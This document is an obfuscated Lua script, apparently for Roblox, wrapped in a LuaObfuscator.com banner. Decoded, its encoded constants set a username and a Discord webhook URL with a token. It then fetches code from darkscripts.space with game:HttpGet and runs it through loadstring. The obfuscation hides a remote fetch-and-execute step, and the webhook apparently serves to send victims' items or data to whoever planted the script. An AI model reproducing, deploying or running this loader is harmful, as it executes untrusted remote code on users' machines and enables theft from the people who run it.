--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v112=v5(v90,v19);v19=nil;return v112;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -(118 -(32 + 85))))))%((1 + 1)^(((v33-((1 + 0) -0)) -(v32-((3823 -2945) -(282 + 595)))) + (2 -1))) ;return v91-(v91%(620 -(555 + 64))) ;else local v92=(2 + 0)^(v32-(1 -0)) ;return (((v31%(v92 + v92))>=v92) and (932 -(857 + 74))) or (1270 -(226 + 1044)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -(180 -(67 + 113))) ;v34=958 -(892 + 65) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==((556 + 397) -(802 + 150))) then return (v42 * 16777216) + (v41 * ((232048 -55604) -110908)) + (v40 * (464 -(1395 -(1069 + 118)))) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + (8 -4) ;v38=2 -1 ;end end end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(3 -1)) then v48=v20(v45,4 + 17 ,(121 -67) -23 );v49=((v20(v45,(1445 -(447 + 966)) + 0 )==(792 -(368 + 423))) and  -(1 + 0)) or ((8 -5) -2) ;v43=21 -(10 + 8) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=443 -((2233 -(1703 + 114)) + 26) ;end if (v43==(9 -(707 -(376 + 325)))) then if (v48==(1080 -(1020 + 60))) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else local v120=0 -0 ;while true do if (v120==0) then v48=1 + 0 ;v46=0 -0 ;break;end end end elseif (v48==2047) then return ((v47==((0 -0) -0)) and (v49 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + (1501 -1013))) ) * (v46 + (v47/((1 + 1)^(43 + 9)))) ;end if (v43==(773 -(201 + 164 + 407))) then v46=1139 -(116 + 1022) ;v47=(v20(v45,1 + 0 ,1075 -(87 + 968) ) * (((17 -9) -6)^(19 + 13))) + v44 ;v43=2 + 0 ;end end end local function v25(v50) local v51=254 -(163 + 91) ;local v52;local v53;while true do if (v51==(1933 -(1869 + 61))) then return v6(v53);end if (v51==(1 + (1475 -(1329 + 145)))) then v53={};for v113=15 -((980 -(140 + 831)) + (1855 -(1409 + 441))) , #v52 do v53[v113]=v2(v1(v3(v52,v113,v113)));end v51=(1097 -(15 + 703)) -(85 + 291) ;end if (v51==(1265 -(243 + 474 + 548))) then v52=nil;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=1 + 0 ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -(1181 -(1123 + 57)) );v18=v18 + v50 ;v51=2 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do local v111=(function() return 0;end)();while true do if (v111~=(386 -(157 + 229))) then else if (v102~=1) then else local v123=(function() return 0;end)();while true do if (v123==0) then while true do if (v93~=(0 -0)) then else v94=(function() return v95();end)();if (v96(v94, #":", #"!")==(0 + 0)) then local v174=(function() return 0;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v174==0) then local v181=(function() return 0 -0 ;end)();while true do if (v181==0) then v175=(function() return 1251 -(721 + 530) ;end)();v176=(function() return nil;end)();v181=(function() return 1272 -(945 + 326) ;end)();end if (v181~=(2 -1)) then else v174=(function() return 1 + 0 ;end)();break;end end end if (v174~=2) then else while true do if (v175==(702 -(271 + 429))) then local v183=(function() return 0;end)();while true do if (v183~=1) then else v175=(function() return  #"asd";end)();break;end if (v183~=0) then else if (v96(v177, #">", #"~")== #"{") then v178[2 + 0 ]=(function() return v97[v178[2]];end)();end if (v96(v177,1502 -(1408 + 92) ,1088 -(461 + 625) )== #".") then v178[ #"asd"]=(function() return v97[v178[ #"asd"]];end)();end v183=(function() return 1;end)();end end end if (v175~= #"}") then else local v184=(function() return 1288 -(993 + 295) ;end)();local v185=(function() return;end)();while true do if (0~=v184) then else v185=(function() return 0 + 0 ;end)();while true do if ((1172 -(418 + 753))~=v185) then else v175=(function() return 1 + 1 ;end)();break;end if (v185==(0 + 0)) then v178=(function() return {v98(),v98(),nil,nil};end)();if (v176==(0 + 0)) then local v191=(function() return 0 + 0 ;end)();local v192=(function() return;end)();while true do if (v191~=0) then else v192=(function() return 0;end)();while true do if (v192==(529 -(406 + 123))) then v178[ #"91("]=(function() return v98();end)();v178[ #"http"]=(function() return v98();end)();break;end end break;end end elseif (v176== #"~") then v178[ #"91("]=(function() return v99();end)();elseif (v176==2) then v178[ #"gha"]=(function() return v99() -((1771 -(1749 + 20))^(4 + 12)) ;end)();elseif (v176== #"xnx") then local v197=(function() return 1322 -(1249 + 73) ;end)();local v198=(function() return;end)();while true do if (v197~=0) then else v198=(function() return 0 + 0 ;end)();while true do if (v198==(1145 -(466 + 679))) then v178[ #"xnx"]=(function() return v99() -((4 -2)^(45 -29)) ;end)();v178[ #"0313"]=(function() return v98();end)();break;end end break;end end end v185=(function() return 1901 -(106 + 1794) ;end)();end end break;end end end if (v175~= #"gha") then else if (v96(v177, #"nil", #"xxx")== #"!") then v178[ #"asd1"]=(function() return v97[v178[ #"0836"]];end)();end v100[v101]=(function() return v178;end)();break;end if (v175~=(0 + 0)) then else local v187=(function() return 0;end)();while true do if (v187~=0) then else v176=(function() return v96(v94,1 + 1 , #"xnx");end)();v177=(function() return v96(v94, #"0836",6);end)();v187=(function() return 1;end)();end if (v187~=1) then else v175=(function() return  #"[";end)();break;end end end end break;end if (v174~=1) then else local v182=(function() return 0 -0 ;end)();while true do if (v182~=0) then else v177=(function() return nil;end)();v178=(function() return nil;end)();v182=(function() return 1;end)();end if (v182==1) then v174=(function() return 2;end)();break;end end end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end if (v102==(0 -0)) then v93=(function() return 0;end)();v94=(function() return nil;end)();v102=(function() return 115 -(4 + 110) ;end)();end break;end end end end;end)();local v55=(function() return function(v103,v104,v105) local v106=(function() return 584 -(57 + 527) ;end)();local v107=(function() return;end)();while true do if (v106==0) then v107=(function() return 0;end)();while true do if (v107==(1427 -(41 + 1386))) then local v124=(function() return 103 -(17 + 86) ;end)();while true do if (v124==0) then v103[v104-#"," ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"]",v60 do local v70=(function() return 0 + 0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (0==v70) then local v115=(function() return 0 -0 ;end)();while true do if (v115~=1) then else v70=(function() return 1;end)();break;end if ((0 -0)~=v115) then else v71=(function() return 0;end)();v72=(function() return nil;end)();v115=(function() return 167 -(122 + 44) ;end)();end end end if (v70==1) then v73=(function() return nil;end)();while true do if (v71==(1 -0)) then if (v72== #"[") then v73=(function() return v21()~=0 ;end)();elseif (v72==(6 -4)) then v73=(function() return v24();end)();elseif (v72~= #"xnx") then else v73=(function() return v25();end)();end v61[v69]=(function() return v73;end)();break;end if (v71~=0) then else local v122=(function() return 0 + 0 ;end)();while true do if (v122==1) then v71=(function() return 1;end)();break;end if ((0 + 0)==v122) then v72=(function() return v21();end)();v73=(function() return nil;end)();v122=(function() return 1 -0 ;end)();end end end end break;end end end v59[ #"gha"]=(function() return v21();end)();for v74= #".",v23() do FlatIdent_60EA1,Descriptor,v21,v20,v61,v22,v23,v56,v74=(function() return v54(FlatIdent_60EA1,Descriptor,v21,v20,v61,v22,v23,v56,v74);end)();end for v75= #"~",v23() do v57,v75,v28=(function() return v55(v57,v75,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[66 -(30 + 35) ];local v67=v63[2 + 0 ];local v68=v63[(924 + 336) -(1043 + 214) ];return function(...) local v76=v66;local v77=v67;local v78=v68;local v79=v27;local v80=3 -2 ;local v81= -(1213 -(242 + 81 + 889));local v82={};local v83={...};local v84=v12("#",...) -((2 + 0) -1) ;local v85={};local v86={};for v108=580 -(361 + 219) ,v84 do if ((v108>=v78) or (443>=4015)) then v82[v108-v78 ]=v83[v108 + ((1446 -(936 + 189)) -(53 + 267)) ];else v86[v108]=v83[v108 + 1 + 0 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[(137 + 277) -(15 + 398) ];if ((3382>166) and (v89<=(989 -(18 + 964)))) then if (v89<=(11 -8)) then if (v89<=(1 + 0)) then if ((v89>((1613 -(1565 + 48)) + 0)) or (280==3059)) then local v125=1975 -(1913 + 62) ;local v126;local v127;while true do if ((1881>1293) and (((1989 -(782 + 356)) -(20 + 830))==v125)) then v86[v126 + 1 + 0 ]=v127;v86[v126]=v127[v88[(397 -(176 + 91)) -(116 + 10) ]];break;end if (v125==(0 + 0)) then v126=v88[740 -((1411 -869) + 196) ];v127=v86[v88[3]];v125=(1 + 0) -0 ;end end else v86[v88[1 + 1 ]]=v88[2 + (2 -1) ];end elseif ((2357==2357) and (v89==2)) then do return;end else local v130=0 + 0 ;local v131;local v132;while true do if (v130==(0 -(0 -0))) then v131=v88[4 -2 ];v132=v86[v88[1554 -(1126 + 425) ]];v130=406 -(118 + (2220 -(565 + 1368))) ;end if (v130==((1095 -(975 + 117)) -2)) then v86[v131 + 1 ]=v132;v86[v131]=v132[v88[1125 -(118 + 1003) ]];break;end end end elseif ((123==123) and (v89<=((52 -38) -9))) then if (v89==(381 -(142 + 235))) then local v133=v88[9 -7 ];v86[v133]=v86[v133](v13(v86,v133 + 1 ,v81));else v86[v88[1 + 1 ]]=v65[v88[(2855 -(157 + 1718)) -(553 + (2085 -(1477 + 184))) ]];end elseif ((v89==(10 -(4 + 0))) or (1056>=3392)) then v86[v88[2 + 0 ]]=v88[(3 -0) + 0 ];else v86[v88[(6 -4) + 0 ]]();end elseif ((v89<=(5 + 6)) or (1081<1075)) then if (v89<=(6 + 3)) then if (v89==8) then v86[v88[4 -2 ]]();else local v139=v88[5 -3 ];local v140,v141=v79(v86[v139](v13(v86,v139 + ((2 + 0) -1) ,v88[1 + (6 -4) ])));v81=(v141 + v139) -(4 -3) ;local v142=753 -(239 + 514) ;for v157=v139,v81 do local v158=0 + 0 ;while true do if ((v158==(1329 -(797 + 532))) or (1049>=4432)) then v142=v142 + 1 ;v86[v157]=v140[v142];break;end end end end elseif ((v89==((864 -(564 + 292)) + 2)) or (4768<=846)) then v65[v88[(2 -0) + 1 ]]=v86[v88[2]];else v65[v88[(1024 -(697 + 321)) -3 ]]=v86[v88[1204 -(373 + (2498 -1669)) ]];end elseif (v89<=(744 -(476 + (694 -439)))) then if (v89>(1142 -(369 + 761))) then v86[v88[2]]=v65[v88[2 + 1 ]];else local v149=0 -0 ;local v150;local v151;local v152;local v153;while true do if (v149==(0 -(304 -(244 + 60)))) then v150=v88[240 -(64 + 174) ];v151,v152=v79(v86[v150](v13(v86,v150 + 1 + 0 ,v88[3 -0 ])));v149=1 -0 ;end if (v149==1) then v81=(v152 + v150) -(337 -(144 + 192)) ;v153=0;v149=218 -(42 + 174) ;end if ((v149==(2 + 0)) or (3358<=1420)) then for v172=v150,v81 do local v173=0 + 0 ;while true do if (v173==(0 + 0)) then v153=v153 + (1505 -(363 + 1141)) ;v86[v172]=v151[v153];break;end end end break;end end end elseif ((v89>(11 + 3)) or (3739<=3005)) then local v154=v88[1582 -((2726 -1543) + (873 -(41 + 435))) ];v86[v154]=v86[v154](v13(v86,v154 + 1 ,v81));else do return;end end v80=v80 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003083Q00557365726E616D6503083Q005831335F574F524B03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239372Q322Q3331393138372Q322Q3634362F6C2Q465436634F7850492Q6A4359764D394161536D566A625256534F79786530572Q48726A57387753386F48643369592Q64552D73453876453267382D6A686459734147030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F000C3Q0012063Q00023Q00120A3Q00013Q0012063Q00043Q00120A3Q00033Q00120D3Q00053Q00120D000100063Q002003000100010007001206000300084Q0009000100034Q000F5Q00022Q00083Q000100012Q000E3Q00017Q00",v9(),...);
